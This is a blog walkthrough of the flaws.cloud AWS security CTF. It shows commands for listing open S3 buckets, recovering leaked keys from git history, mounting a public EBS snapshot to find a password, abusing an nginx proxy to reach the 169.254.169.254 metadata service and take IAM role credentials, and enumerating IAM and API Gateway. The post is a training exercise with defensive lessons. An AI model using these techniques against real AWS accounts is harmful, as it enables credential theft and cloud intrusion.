Hacking AWS [Flaws.cloud Walkthrough]

KISHORERAM
18 min read · Jan 20, 2024


Flaws.cloud is an interactive platform created by Scott Piper of Summit Route, serving as an educational tool for Amazon Web Services (AWS) security concepts. Designed as a Capture The Flag (CTF) challenge, it offers an engaging and fun way to learn the basics of AWS security. The platform includes challenges and tutorials to enhance participants’ understanding of AWS security, covering topics like misconfigurations and defensive analysis.

http://flaws.cloud/

Level 1 [buckets of fun]

The site flaws.cloud is hosted as an S3 bucket. This is a great way to host a static site, similar to hosting one via GitHub Pages. Some interesting facts about S3 hosting: when hosting a site as an S3 bucket, the bucket name (flaws.cloud) must match the domain name (flaws.cloud). Also, S3 bucket names live in a global namespace, meaning two people cannot have buckets with the same name. The result is that you could create a bucket named apple.com and Apple would never be able to host their main site via S3 hosting.

You can determine the site is hosted as an S3 bucket by running a DNS lookup on the domain:

dig flaws.cloud

;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.180.194
flaws.cloud. 5 IN A 52.218.236.210
flaws.cloud. 5 IN A 52.92.240.107
flaws.cloud. 5 IN A 52.92.188.219
flaws.cloud. 5 IN A 52.92.225.107
flaws.cloud. 5 IN A 52.92.165.11
flaws.cloud. 5 IN A 52.92.235.67
flaws.cloud. 5 IN A 52.92.132.219
nslookup flaws.cloud

Server: 192.168.33.253
Address: 192.168.33.253#53

Non-authoritative answer:
Name: flaws.cloud
Address: 52.218.234.26
Name: flaws.cloud
Address: 52.92.179.171
Name: flaws.cloud
Address: 52.92.249.147
host flaws.cloud
flaws.cloud has address 52.218.178.219
flaws.cloud has address 52.92.130.83
flaws.cloud has address 52.92.187.155
flaws.cloud has address 52.218.178.171
flaws.cloud has address 52.92.161.67
flaws.cloud has address 52.218.217.18
flaws.cloud has address 52.218.236.18
flaws.cloud has address 52.218.244.74
dig +short -x 52.218.234.26
s3-website-us-west-2.amazonaws.com.

S3 bucket discovered at s3-website-us-west-2.amazonaws.com

S3 bucket address translation: http://flaws.cloud.s3-website-us-west-2.amazonaws.com/

AWS SETUP

We need to interact with AWS resources, and for that we need the AWS CLI. I installed it on my Kali Linux machine and also installed Terraform, which will be useful later.

Install AWS CLI

curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install

Check the version

aws --version

Install Terraform

Terraform is a software tool that allows engineers to define and manage their software infrastructure using code. It’s an Infrastructure as Code (IaC) tool that provides a consistent command line interface (CLI) workflow to manage hundreds of cloud services.

sudo apt install terraform

Check if it is installed

terraform -h

Once the AWS CLI is installed, we need to configure it. For that you need to sign up and create an AWS account (a free-tier account is fine). After you create an account, generate an access key and secret access key. For the region you can select us-west-2, since flaws is hosted in that region. You can create a named profile with aws configure to manage your configuration; it will also be useful when destroying the resources you create later.

aws configure --profile Profilename

If you happen to not know the region, there are only a dozen or so regions to try. You could also use the GUI tool Cyberduck to browse the bucket; it will figure out the region automatically.

To list the bucket we use aws s3 with the ls subcommand against the flaws.cloud bucket, with the region set to us-west-2. The --no-sign-request flag tells the CLI not to sign the request or look for credentials, so the call works even if no AWS account is configured.
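A minimal listing along those lines (bucket name and region as discovered above):

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2

We can then look at the secret file it reveals in the browser, using either of these URL formats: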

http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/

Lesson learned[From flaws.cloud]

On AWS you can set up S3 buckets with all sorts of permissions and functionality including using them to host static files. A number of people accidentally open them up with permissions that are too loose. Just like how you shouldn’t allow directory listings of web servers, you shouldn’t allow bucket listings.

Avoiding the mistake[From flaws.cloud]

By default, S3 buckets are private and secure when they are created. To allow it to be accessed as a web page, I had to turn on “Static Website Hosting” and change the bucket policy to allow everyone “s3:GetObject” privileges, which is fine if you plan to publicly host the bucket as a web page. But then, to introduce the flaw, I changed the permissions to add “Everyone” to have “List” permissions.

“Everyone” means everyone on the Internet. Thanks to that List permission, you can also list the files simply by going to http://flaws.cloud.s3.amazonaws.com/ in a browser.

Level 2

The next level is fairly similar, with a slight twist. You’re going to need your own AWS account for this. You just need the free tier. http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

I got another secret file by using the same listing command, this time as an authenticated AWS user.
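With a profile configured, the listing looks something like this (Profilename is whatever you chose during aws configure):

aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ --profile Profilename --region us-west-2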

Lesson learned[From flaws.cloud]

Similar to opening permissions to “Everyone”, people accidentally open permissions to “Any Authenticated AWS User”. They might mistakenly think this will only be users of their account, when in fact it means anyone that has an AWS account.

Avoiding the mistake[From flaws.cloud]

Only open permissions to specific AWS users.

(flaws.cloud shows a screenshot of this setting from the web console in 2017.) This setting can no longer be set in the web console, but the SDK and third-party tools sometimes allow it. For example:

aws s3api put-bucket-acl --bucket bucketname --acl authenticated-read
aws s3api put-object-acl --bucket bucketname --key file --acl authenticated-read

Level 3

The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are. http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

The bucket contains a git repository (a .git directory), so let's download the entire bucket locally:

aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

Inspecting the git log
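Inside the directory we just synced, the commit history can be viewed with:

git log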

One commit message mentions an accidental addition, so let's check out that commit:

git checkout b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
+access_key AKIAJ366LIPB4IJKT7SA
+secret_access_key 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

Using the leaked access key and secret access key, I configured a new profile (flaws) and used it to list the S3 buckets in the account.
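Roughly (the leaked keys go into the new profile when prompted):

aws configure --profile flaws
aws s3 ls --profile flaws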

Now we can see the level 4, 5, 6, and final-level buckets; let's note down the bucket URLs:

level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Lesson learned[From flaws.cloud]

People often leak AWS keys and then try to cover up their mistakes without revoking the keys. You should always revoke any AWS keys (or any secrets) that could have been leaked or were misplaced. Roll your secrets early and often. Similarly, be aware that buckets use a global namespace, meaning that bucket names must be unique across all customers, so if you create a bucket named `merger_with_company_Y` or something that is supposed to be secret, it's technically possible for someone to discover that bucket exists.

Avoiding this mistake[From flaws.cloud]

Always roll your secrets if you suspect they were compromised or made public or stored or shared incorrectly. Roll early, roll often. Rolling secrets means that you revoke the keys (ie. delete them from the AWS account) and generate new ones.

Level 4

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud. It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was set up on it.

We need to access the web page hosted on an EC2 instance. If we click the link, we are asked for credentials, so we need to find a way to get them. We start by enumerating the user we found, using STS (Security Token Service), which issues and validates temporary security credentials for AWS accounts. The AWS STS GetCallerIdentity API returns details about the IAM user or role whose credentials are used to call the operation, including the user ID, the 12-digit account ID, and the user ARN. No permissions are required to perform this operation. An Amazon Resource Name (ARN) is a unique string of characters that identifies an AWS resource; ARNs are used to identify resources such as users, EC2 instances, S3 buckets, and Lambda functions.

aws sts get-caller-identity --profile flawslevel3

We can see that our user is called "backup" in IAM.

We identified the account ID using aws --profile flawslevel3 sts get-caller-identity: account ID 975426262029. We also need to add the us-west-2 region to ~/.aws/config. We can then see all the snapshots owned by this account using describe-snapshots. By default snapshots are private, and you can share them between accounts securely by specifying the account ID of the other account, but it seems a number of people just make them public and forget about them.
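The snapshot enumeration looks something like this, filtering on the account ID we just found as the owner:

aws ec2 describe-snapshots --owner-ids 975426262029 --profile flawslevel3 --region us-west-2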

We can check the permissions on this snapshot with:

aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flawslevel3

We can see that anyone can create a volume based on this snapshot. Now that we know the snapshot ID, we'll want to mount it and see what's in it. You'll need to do this in your own AWS account. (This article walks through creating a volume and attaching it to an EC2 instance via the GUI: https://ec2-tutorials.readthedocs.io/en/latest/volumes-and-snapshots.html)

First, create a volume in us-west-2 from the public snapshot we found earlier:

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

We can verify that it worked by running aws ec2 describe-volumes --region us-west-2 and seeing the volume listed. After that, we need to use the AWS web console to create an EC2 instance. Go onto the portal and hit the "create a VM with EC2" button. In the URL I was sent to us-east-2, so I just changed that to us-west-2, since our volume is available there. Any EC2 instance should do, so let's go for an Ubuntu image. After it is created we will SSH in and manually mount our volume, or add a volume at launch and specify that snapshot ID. At this point you should be able to run both of these commands and see output:

aws ec2 describe-instances --region us-west-2
aws ec2 describe-volumes --region us-west-2

We can then attach the volume to the instance with the following (the volume ID and instance ID are unique to you; make sure the volume and instance are in the same region, us-west-2):

aws ec2 attach-volume --volume-id vol-randnum --instance-id i-randnum --device /dev/sdf --region us-west-2

Download the key pair, change the permissions on the downloaded .pem file, and SSH in:

ssh -i YOUR_KEY.pem ubuntu@ec2-54-191-240-80.us-west-2.compute.amazonaws.com
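For reference, the permission change mentioned above is the usual one for SSH keys:

chmod 400 YOUR_KEY.pem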

First, list information about all available block devices using lsblk; xvdf1 is our attached volume.
View drive information: sudo file -s /dev/xvdf1
Mount the drive: sudo mount /dev/xvdf1 /mnt

Exploring /home/ubuntu on the mounted volume, we discover a file containing a cleartext password: setupNginx.sh
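A quick look at the file (path assuming the volume is mounted at /mnt, as above):

sudo cat /mnt/home/ubuntu/setupNginx.sh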

Log in to the web service at http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ using the discovered credentials, and we gain access to level 5.
flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Lesson learned[From flaws.cloud]

AWS allows you to make snapshots of EC2’s and databases (RDS). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2’s when they forget the passwords. This also allows attackers to get access to things. Snapshots are normally restricted to your own account, so a possible attack would be an attacker getting access to an AWS key that allows them to start/stop and do other things with EC2’s and then uses that to snapshot an EC2 and spin up an EC2 with that volume in your environment to get access to it. Like all backups, you need to be cautious about protecting them.

Level 5

This EC2 has a simple HTTP-only proxy on it. Here are some examples of its usage:

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/

See if you can use this proxy to figure out how to list the contents of the level6 bucket at
level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.

We can see the configuration of this proxy in /etc/nginx/sites-available/default:

location ~* ^/proxy/((?U).+)/(.*)$ {
    limit_except GET {
        deny all;
    }
    limit_req zone=one burst=1;
    set $proxyhost '$1';
    set $proxyuri '$2';
    proxy_limit_rate 4096;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header Host $proxyhost;
    resolver 8.8.8.8;
    proxy_pass http://$proxyhost/$proxyuri;
}

This is similar to the Capital One hack, in which a misconfigured firewall and proxy running on an EC2 instance could be used to retrieve credentials from the EC2 instance metadata service (IMDS). You can read more about it in another of my stories: https://kishoreramk.medium.com/securing-aws-understanding-ec2-imds-vulnerabilities-and-learning-from-the-capital-one-breach-6f753e06cd66

Let's use the proxy to query the metadata service and see the instance's metadata.

curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/

Navigating through this, we find iam, which is pretty interesting, so we can dig deeper for more information.

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/info
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

We find an access key and secret access key, so let's create a profile using them. There is also a session token present, because these are temporary credentials issued to the instance's IAM role.

Adding the session token to ~/.aws/credentials:
nano ~/.aws/credentials
aws_session_token = ..
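A complete profile entry would look something like this (the profile name level5 is just a label; the three values come from the metadata response), and the new profile can then list the level6 bucket:

[level5]
aws_access_key_id = <AccessKeyId from the metadata response>
aws_secret_access_key = <SecretAccessKey from the metadata response>
aws_session_token = <Token from the metadata response>

aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ --profile level5 --region us-west-2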

Listing the level6 bucket with this new profile shows a directory named ddcc78ff, so let's go to the following URL.

http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

Lesson learned[From flaws.cloud]

The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. AWS has recently created a new IMDSv2 that requires special headers, a challenge and response, and other protections, but many AWS accounts may not have enforced it. If you can make any sort of HTTP request from an EC2 to that IP, you’ll likely get back information the owner would prefer you not see.

Avoiding this mistake[From flaws.cloud]

Ensure your applications do not allow access to 169.254.169.254 or any local and private IP ranges. Additionally, ensure that IAM roles are restricted as much as possible.

Level 6

For this final challenge, you’re getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.

Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: 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

Now let's look at what the SecurityAudit policy is in the AWS documentation. The SecurityAudit template grants access to read security configuration metadata. It is useful for software that audits the configuration of an AWS account. https://docs.aws.amazon.com/aws-managed-policy/latest/reference/SecurityAudit.html

List of IAM Commands https://docs.aws.amazon.com/cli/latest/reference/iam/

IAM enumeration:

The iam get-user command retrieves information about a specified IAM user, including the user's creation date, path, unique ID, and ARN. From there we can list the users in the account and enumerate the policies attached to our user, as sketched below.
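The corresponding calls look roughly like this (the profile name level6 is an assumption; the user name, here Level6, comes back from get-user):

aws iam get-user --profile level6
aws iam list-users --profile level6
aws iam list-attached-user-policies --user-name Level6 --profile level6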

We can see some Lambda execution policies, so let's look around for some Lambda functions. AWS Lambda is a serverless, event-driven computing service from Amazon Web Services. It allows developers to run code for any type of application or backend service without managing servers. AWS Lambda can be triggered from over 200 AWS services and SaaS applications, and users only pay for what they use. This is sometimes referred to as function-as-a-service (FaaS).

Now you know that you have two policies attached:

  • “SecurityAudit”: This is an AWS managed policy you can look up either in your console or in the AWS documentation
  • “list_apigateways”: This is a custom policy

Once you know the ARN for the policy, you can get its version ID, and with the ARN and version ID you can see what the actual policy document allows (both lookups are sketched below).
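For example (the policy ARN is built from the account ID found earlier and the custom policy name; the version ID, v4 here, is an assumption and should be whatever get-policy reports as the default version):

aws iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --profile level6
aws iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4 --profile level6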

This tells us that with this policy we can call “apigateway:GET” on “arn:aws:apigateway:us-west-2::/restapis/*”.

Amazon API Gateway is a fully managed service that makes it easy for developers to create, publish, maintain, monitor, and secure APIs at any scale. APIs act as the “front door” for applications to access data, business logic, or functionality from your backend services.

The API gateway in this case is used to call a lambda function, but you need to figure out how to invoke it.

The SecurityAudit policy lets you see some things about Lambdas: listing the functions tells you there is one named “Level6”, and the policy also lets you pull that function's resource policy to see what is allowed to invoke it.
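Roughly (profile and region as before):

aws lambda list-functions --profile level6 --region us-west-2
aws lambda get-policy --function-name Level6 --profile level6 --region us-west-2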

You can create a web API with an HTTP endpoint for your Lambda function by using Amazon API Gateway. API Gateway provides tools for creating and documenting web APIs that route HTTP requests to Lambda functions. You can secure access to your API with authentication and authorization controls. Your APIs can serve traffic over the internet or can be accessible only within your VPC.

This tells you about the ability to execute `arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6`. That “s33ppypa75” is a rest-api-id, which you can then use with that other attached policy.
The invoke URL format for such an API is https://{api-id}.execute-api.{region}.amazonaws.com, where in our case the api-id is s33ppypa75 and the region is us-west-2.

aws --profile level6 --region us-west-2 apigateway get-gateway-responses  --rest-api-id "s33ppypa75"

{
"items": [
{
"responseType": "INTEGRATION_FAILURE",
"statusCode": "504",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "RESOURCE_NOT_FOUND",
"statusCode": "404",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "REQUEST_TOO_LARGE",
"statusCode": "413",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "THROTTLED",
"statusCode": "429",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "UNSUPPORTED_MEDIA_TYPE",
"statusCode": "415",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "AUTHORIZER_CONFIGURATION_ERROR",
"statusCode": "500",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "DEFAULT_5XX",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "DEFAULT_4XX",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "BAD_REQUEST_PARAMETERS",
"statusCode": "400",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "BAD_REQUEST_BODY",
"statusCode": "400",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "WAF_FILTERED",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "EXPIRED_TOKEN",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "ACCESS_DENIED",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "INVALID_API_KEY",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "UNAUTHORIZED",
"statusCode": "401",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "API_CONFIGURATION_ERROR",
"statusCode": "500",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "QUOTA_EXCEEDED",
"statusCode": "429",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "INTEGRATION_TIMEOUT",
"statusCode": "504",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "MISSING_AUTHENTICATION_TOKEN",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "INVALID_SIGNATURE",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "AUTHORIZER_FAILURE",
"statusCode": "500",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
}
]
}

These are the gateway responses for this API gateway, which don't get us much further on their own. The apigateway service offers plenty of other read subcommands:

create-api-key                           | create-authorizer                       
create-base-path-mapping | create-deployment
create-documentation-part | create-documentation-version
create-domain-name | create-model
create-request-validator | create-resource
create-rest-api | create-stage
create-usage-plan | create-usage-plan-key
create-vpc-link | delete-api-key
delete-authorizer | delete-base-path-mapping
delete-client-certificate | delete-deployment
delete-documentation-part | delete-documentation-version
delete-domain-name | delete-gateway-response
delete-integration | delete-integration-response
delete-method | delete-method-response
delete-model | delete-request-validator
delete-resource | delete-rest-api
delete-stage | delete-usage-plan
delete-usage-plan-key | delete-vpc-link
flush-stage-authorizers-cache | flush-stage-cache
generate-client-certificate | get-account
get-api-key | get-api-keys
get-authorizer | get-authorizers
get-base-path-mapping | get-base-path-mappings
get-client-certificate | get-client-certificates
get-deployment | get-deployments
get-documentation-part | get-documentation-parts
get-documentation-version | get-documentation-versions
get-domain-name | get-domain-names
get-export | get-gateway-response
get-gateway-responses | get-integration
get-integration-response | get-method
get-method-response | get-model
get-model-template | get-models
get-request-validator | get-request-validators
get-resource | get-resources
get-rest-api | get-rest-apis
get-sdk | get-sdk-type
get-sdk-types | get-stage
get-stages | get-tags
get-usage | get-usage-plan
get-usage-plan-key | get-usage-plan-keys
get-usage-plans | get-vpc-link
get-vpc-links | import-api-keys
import-documentation-parts | import-rest-api
put-gateway-response | put-integration
put-integration-response | put-method
put-method-response | put-rest-api
tag-resource | test-invoke-authorizer
test-invoke-method | untag-resource
update-account | update-api-key
update-authorizer | update-base-path-mapping
update-client-certificate | update-deployment
update-documentation-part | update-documentation-version
update-domain-name | update-gateway-response
update-integration | update-integration-response
update-method | update-method-response
update-model | update-request-validator
update-resource | update-rest-api
update-stage | update-usage
update-usage-plan | update-vpc-link
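Among all those subcommands, get-stages is the one that gets us further; something like:

aws apigateway get-stages --rest-api-id "s33ppypa75" --profile level6 --region us-west-2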

That tells you the stage name is “Prod”. Lambda functions are called using that rest-api-id, stage name, region, and resource as https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
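Hitting that URL (with a browser or curl) should return the link to the final level page:

curl https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6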

Lesson learned[From flaws.cloud]

It is common to give people and entities read-only permissions such as the SecurityAudit policy. The ability to read your own and others' IAM policies can really help an attacker figure out what exists in your environment and look for weaknesses and mistakes.

Avoiding this mistake[From flaws.cloud]

Don’t hand out any permissions liberally, even permissions that only let you read meta-data or know what your permissions are.


Thanks For Reading :)

Don’t miss out on my upcoming articles! Follow me on Medium for more insightful content. Clap and share this article to spread the knowledge among fellow bug bounty hunters and cybersecurity enthusiasts.

If you have any further questions or would like to connect, feel free to reach out to me.

My LinkedIn handle: https://www.linkedin.com/in/kishoreram-k/
